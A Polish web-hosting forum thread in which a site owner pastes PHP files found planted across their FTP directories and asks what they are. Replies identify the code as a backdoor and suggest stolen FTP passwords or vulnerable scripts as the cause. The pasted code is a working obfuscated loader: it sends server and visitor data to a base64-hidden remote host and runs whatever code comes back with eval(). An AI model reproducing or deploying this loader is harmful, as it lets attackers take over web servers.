Włam na serwer?, Proszę o sprawdzenie kodu Opcje

[deha21]

Dziś na FTPie zobaczyłem dziwne pliku typu 14234.php w każdym z podkatalogów. A nich był taki kod:

[PHP] pobierz, plaintext 
error_reporting(0);
$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cGhwZmVlZC5ydQ==");
 
if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="efc1c2e5b4abb3c0af1b6ff7a20906a7") $f=$_REQUEST["id"];
if($c=file_get_contents(base64_decode("aHR0cDovLzdhZHMu").$f.$z))eval($c);
else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);
else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);
curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);
$o=curl_exec($cu);
curl_close($cu);
eval($o);};
die();
[PHP] pobierz, plaintext 

Ktoś może mi powiedzieć co to jest? Ktoś chciał się włamać na serwer?

[Fifi209]

Zgadnę, że łączysz się przez total commandera, filezillę czy coś w ten deseń - oczywiście hasła zapamiętane. ;]
Wirus odczytuje hasła z ftp i loginy i robi co chce - np. dodaje kod złośliwy.

[deha21]

Zgadnę, że łączysz się przez total commandera, filezillę czy coś w ten deseń - oczywiście hasła zapamiętane. ;]

Błąd (IMG:style_emoticons/default/wink.gif) Używam Maca, korzystam z CyberDuck (darmowy, ściągnięty z oficjalnej strony)

[Fifi209]

Zacznij od zmiany hasła, potem od usuwania kodu.

btw na macu to wirusów nie ma? jakaś nowość.

Ten post edytował fifi209 4.03.2011, 20:01:08

[deha21]

Ok zmienione, tak na wszelki wypadek. Co to kod miał za zadanie zrobić?

btw na macu to wirusów nie ma? jakaś nowość.

Są ale jest ich na pewno mniej i są rzadziej spotykane. Poza tym chyba ciężko dorzucić wirusa do programu który jest oryginalny i od ponad roku nie sprawiał problemów?

[erix]

~fifi209, to że ktoś z TC korzysta, to nie znaczy, że hasła muszą pochodzić z tego miejsca. Można korzystać z globalnego klucza albo SFTP/SCP (tak, da się (IMG:style_emoticons/default/tongue.gif) ).

Ktoś może mi powiedzieć co to jest? Ktoś chciał się włamać na serwer?

Sprawdź swoje skrypty. Są dziurawe. Albo któraś z bibliotek, z których korzystają.

To zwykły backdoor, który pozwala na dołączenie Twojego serwera jako farmy zombie.

[kiler129]

~fifi209, to że ktoś z TC korzysta, to nie znaczy, że hasła muszą pochodzić z tego miejsca. Można korzystać z globalnego klucza albo SFTP/SCP (tak, da się (IMG:style_emoticons/default/tongue.gif) ).

Większość serwerów nie pozwala na SFTP (bo to w końcu SSH, do tego wolne bo nie projektowano go do transferu plików). Dodajmy że OSX to nie windows - pyta cię zawsze o dostęp do keyringa oraz jeśli to nieznana apka to dodatkowo o twoje hasło.
Z doświadczenia powiem, że nie ma za bardzo sposobu aby z keyringa hasła wyciągać - szybciej tutaj jest błąd w samej webaplikacji - zanalizuj logi lub je pokaż tu.